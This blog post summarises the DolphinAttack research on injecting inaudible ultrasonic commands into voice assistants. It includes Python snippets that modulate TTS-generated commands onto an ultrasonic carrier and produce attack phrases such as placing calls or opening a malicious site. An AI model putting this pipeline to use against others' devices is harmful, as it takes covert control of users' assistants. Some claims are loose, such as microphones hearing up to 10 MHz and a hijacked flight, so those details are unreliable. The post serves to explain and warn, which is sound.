DolphinAttack: simulated text-to-speech commands at ultrasonic frequencies can take over voice-powered AI assistants

Remember those books and movies we used to devour in our childhood, where there would be a dog who could respond to an ultrasonic whistle (which no one else could hear) and save the day?

Well, that was fiction - but how often has life imitated fiction? Just open any Jules Verne book. Basically, whatever he wrote - Man went ahead and did it! <tangent/ go MAN, you rock>

The race for AI is on, and while exciting innovations are fundamentally changing our lives, the spectre of security threats has never been more omnipresent than now.

It will be more critical in the days to come.

Voice-powered AI assistants have commanded reams of PR headlines in recent years. Alexa, Siri, anyone? While it is a dream to have these diminutive AI tools act on verbal commands, it seems they might have a very simple but serious backdoor flaw.

A team of six Chinese researchers from Zhejiang University have discovered a vulnerability in voice assistants from Apple, Google, Amazon, Microsoft, Samsung, and Huawei. "It affects every iPhone and MacBook running Siri, any Galaxy phone, any PC running Windows 10, and even Amazon's Alexa assistant."

In a detailed research paper published here, the team has shown how, with a $3 apparatus, hackers can simulate text-to-speech commands at ultrasonic frequencies inaudible to the human ear to take over voice-powered AI assistants: making unauthorised calls, opening malicious websites, changing a car's navigation route, and so on.

Imagine what that means for Siri and Apple Pay.

Read the paper in detail. It is titled "DolphinAttack: Inaudible Voice Commands".

A truly fascinating theory put into practice to prove a hypothesis.

But before we go forward, let's try to understand how sound frequencies work with respect to human hearing.

[Figure: the spectrum of sound frequencies and the range of human hearing]

In summary, sound frequencies from 20 kHz up to around 10 MHz are inaudible to the normal human ear (but audible to phone microphones - more on that later).
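
To get a feel for these numbers, here is a minimal Python sketch (assuming only NumPy and the standard library) that writes a 25 kHz tone to a WAV file. The tone is inaudible to an adult listener, yet trivially representable in digital audio as long as the sample rate is at least twice the tone's frequency (the Nyquist criterion).

```python
# A minimal sketch: synthesize a 25 kHz tone, above the ~20 kHz ceiling
# of adult human hearing, but easy for a fast-sampling microphone to register.
import wave

import numpy as np

SAMPLE_RATE = 96_000   # must be at least 2 x 25 kHz (Nyquist) to represent the tone
TONE_HZ = 25_000       # inaudible to the normal human ear
DURATION_S = 2.0

t = np.arange(int(SAMPLE_RATE * DURATION_S)) / SAMPLE_RATE
tone = 0.8 * np.sin(2 * np.pi * TONE_HZ * t)

# Write a 16-bit mono WAV file.
with wave.open("ultrasonic_tone.wav", "wb") as f:
    f.setnchannels(1)
    f.setsampwidth(2)       # 2 bytes = 16-bit samples
    f.setframerate(SAMPLE_RATE)
    f.writeframes((tone * 32767).astype(np.int16).tobytes())
```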

Now let's look at how our voice commands travel inside a phone and get an AI assistant to execute a command.

[Figures: how a voice command travels through a phone's audio pipeline. Image courtesy: research paper "DolphinAttack: Inaudible Voice Commands", authors Guoming Zhang, Chen Yan, Xiaoyu Ji, Tianchen Zhang, Taimin Zhang, Wenyuan Xu]

The challenge, however, lies in mimicking the voice pattern stored in the assistant's memory, at a higher frequency, during wake-up mode.

That's where DolphinAttack comes in. (To clarify, DolphinAttack is an attack sequence built by the team to prove their hypothesis)

So what exactly is DolphinAttack?

Quoting from the paper, "DolphinAttack: Inaudible Voice Commands":

DolphinAttack utilizes inaudible voice Injection to control Voice Controlled Systems (VCSs) silently. Since attackers have little control of the VCSs, the key of a successful attack is to generate inaudible voice commands at the attacking transmitter. In particular, DolphinAttack has to generate the baseband signals of voice commands for both activation and recognition phases of the VCSs, modulate the baseband signals such that they can be demodulated at the VCSs silently, and design a portable transmitter that can launch DolphinAttack anywhere.

The architecture of DolphinAttack

[Figure: the end-to-end architecture of DolphinAttack, from the research paper]

The researchers used the phenomenal advances in text-to-speech (TTS) technology to convert text-based commands into speech, which could then be modulated at frequencies inaudible to the human ear (using a hardware module consisting of a phone, an amplifier, and an ultrasonic transducer) to activate Siri and feed it commands.
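
To picture what that modulation step looks like, here is a minimal NumPy/SciPy sketch of amplitude-modulating a voice recording onto an ultrasonic carrier, the signal technique the paper describes. The file names and the 30 kHz carrier are illustrative assumptions, not values taken from the paper.

```python
# A hedged sketch of the modulation step. Assumes a mono 16-bit WAV of a
# TTS-generated command ("hey_siri.wav" is a hypothetical file name).
import numpy as np
from scipy.io import wavfile

CARRIER_HZ = 30_000    # ultrasonic carrier (illustrative choice)
OUT_RATE = 192_000     # output sample rate high enough to represent the carrier

rate, voice = wavfile.read("hey_siri.wav")   # hypothetical TTS-generated command
voice = voice.astype(np.float64)
voice /= np.max(np.abs(voice))               # normalize the baseband to [-1, 1]

# Resample the baseband to the output rate (simple linear interpolation).
t_in = np.arange(len(voice)) / rate
t_out = np.arange(int(len(voice) * OUT_RATE / rate)) / OUT_RATE
baseband = np.interp(t_out, t_in, voice)

# Classic AM with the carrier retained: (1 + m(t)) * cos(2*pi*fc*t).
# Keeping the carrier is what lets the microphone's nonlinearity
# shift a copy of m(t) back down to audible baseband.
carrier = np.cos(2 * np.pi * CARRIER_HZ * t_out)
am = 0.5 * (1.0 + baseband) * carrier

wavfile.write("hey_siri_ultrasonic.wav", OUT_RATE, (am * 32767).astype(np.int16))
```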

Quoting from the research paper again, 

The recent advancement in TTS technique makes it easy to convert texts to voices. Thus, even if an attacker has no chances to obtain any voice recordings from the user, she can generate a set of activation commands that contain wake words by TTS (Text to Speech) systems. This is inspired by the observation that two users with similar vocal tones can activate the other’s Siri. Thus, as long as one of the activation commands in the set has a voice that is close enough to the owner, it suffices to activate Siri. In DolphinAttack, we prepare a set of activation commands with various tone and timbre with the help of existing TTS systems (summarized in Tab. 1), which include Selvy Speech, Baidu, Google, etc. In total, we obtain 90 types of TTS voices. We choose the Google TTS voice to train Siri and the rest for attacking.

Applications like Alexa and Siri work more on vocal tones than on an exact voice-pattern match. Using Google Text-to-Speech, the researchers trained Siri to respond to machine-simulated commands during wake-up mode.

This is the most difficult part, since the speech-recognition systems in smartphones only authenticate voice patterns during the wake-up phrase (e.g., "Hey Siri"). They do not authenticate the voice commands that launch applications once the system is activated.

This is aided by the fact that the microphones and software that power voice assistants like Siri, Alexa, and Google Home can pick up inaudible frequencies - specifically, frequencies above the 20 kHz limit of human ears.
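
Why does the microphone "hear" the inaudible signal at all? Per the paper's analysis, the culprit is nonlinearity in the microphone circuitry: squaring an amplitude-modulated signal shifts a copy of the voice back down to audible baseband, where the low-pass stage ahead of the speech recognizer happily keeps it. Here is a toy simulation of that effect; all coefficients are made-up illustrations, not measured values.

```python
# A toy simulation of nonlinear demodulation: squaring an AM signal
# produces a baseband copy of the voice, which a low-pass filter recovers.
import numpy as np
from scipy.signal import butter, filtfilt

RATE = 192_000
t = np.arange(int(RATE * 0.5)) / RATE

m = np.sin(2 * np.pi * 400 * t)                        # stand-in "voice": a 400 Hz tone
am = 0.5 * (1.0 + m) * np.cos(2 * np.pi * 30_000 * t)  # the inaudible AM signal

# Toy microphone model: linear gain plus a quadratic term.
recorded = 1.0 * am + 0.5 * am ** 2

# Low-pass at 8 kHz: components near the 30 kHz carrier are discarded,
# leaving the demodulated copy of m(t) that the speech recognizer hears.
b_lp, a_lp = butter(4, 8_000 / (RATE / 2))
recovered = filtfilt(b_lp, a_lp, recorded)
```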

So, in the scenario of a brute-force attack, a hacker can trigger any control command (e.g., "open Google", "show me restaurants on 5th Street", "call 911") using readily available TTS APIs and tools from Google, Baidu, and Selvy Speech - once the wake-up sequence has been activated successfully.
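
To illustrate how little effort such a command set takes to produce, here is a sketch using the gTTS Python package as one stand-in for the TTS services named in the paper. The command list echoes examples from the paper's attack scenarios; the output file names are arbitrary.

```python
# A hedged sketch of the command-generation step using the gTTS package
# (one of many off-the-shelf TTS options). Requires network access.
from gtts import gTTS

commands = [
    "Hey Siri",                    # activation phrase
    "Call 1 2 3 4 5 6 7 8 9 0",    # unauthorised call
    "Open dolphinattack.com",      # malicious website
    "Turn on airplane mode",       # denial of service
]

for i, text in enumerate(commands):
    gTTS(text=text, lang="en").save(f"command_{i}.mp3")
```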

[Figures: experimental setup and results. Image courtesy: research paper "DolphinAttack: Inaudible Voice Commands", authors Guoming Zhang, Chen Yan, Xiaoyu Ji, Tianchen Zhang, Taimin Zhang, Wenyuan Xu]

This is a classic case of user-friendliness at odds with personal security.

Chromecast and Amazon Dash both use frequencies higher than 18 kHz to pair with phones. The experience is seamless and magical but, based on this research, maybe at times a bit vulnerable - something we need to be cognizant of.

Automation is a boon, but like most machine-learning systems it has its Achilles heel. Today, browsers collect cookies easily and invisibly. These cookies record our web behaviour in relentless detail. Individual mobile device IDs can be identified. Digital ads follow us across the web. Maps have a scary way of knowing our routes home. Our phones back up our photos and contacts to the cloud. Our private lives are at the mercy of hackers with a penchant for voyeurism.

Convenience is necessary, even important, but like all benefits it comes with a price. A hidden cost. Our personal security, for starters.

Unchecked, this can go on to create a world where someone sitting in a room with one laptop and a cloud server can control the transatlantic flight you are on at 40,000 feet, or pay for a purchase you never made using your phone and the credit card details stored within it.

Let's take a moment to think about that.

Oh, and for the above scenario: just don't let AI-powered voice assistants run always-on on your phone. Use them when you need to, and close the applications down once your need is complete. Unknowingly, we often let 10-15 programs run always-on in the background of our phones. These programs are constantly communicating with the network - sending push notifications, updating databases in real time, mapping our coordinates, storing information about us and our behaviours. SILENTLY. RELENTLESSLY.

Let's go out. Listen to some music. Read a book.

Have a lollipop.

 

References:

1: This blog is an abstract based on the original research paper "DolphinAttack: Inaudible Voice Commands", conducted and written by Guoming Zhang, Chen Yan, Xiaoyu Ji, Tianchen Zhang, Taimin Zhang, and Wenyuan Xu of Zhejiang University, China.

The copyright of this work, the study, and its findings belongs to them.

The research paper is available publicly here.

2: FastCoDesign.com
